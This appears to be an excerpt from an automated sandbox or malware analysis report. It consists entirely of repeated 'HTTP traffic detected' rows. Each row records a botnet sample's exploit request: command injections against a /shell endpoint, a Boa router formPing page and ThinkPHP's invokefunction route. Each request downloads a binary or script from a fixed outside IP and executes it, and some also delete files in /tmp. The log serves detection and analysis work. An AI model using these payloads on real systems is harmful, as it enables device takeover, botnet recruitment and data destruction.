| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
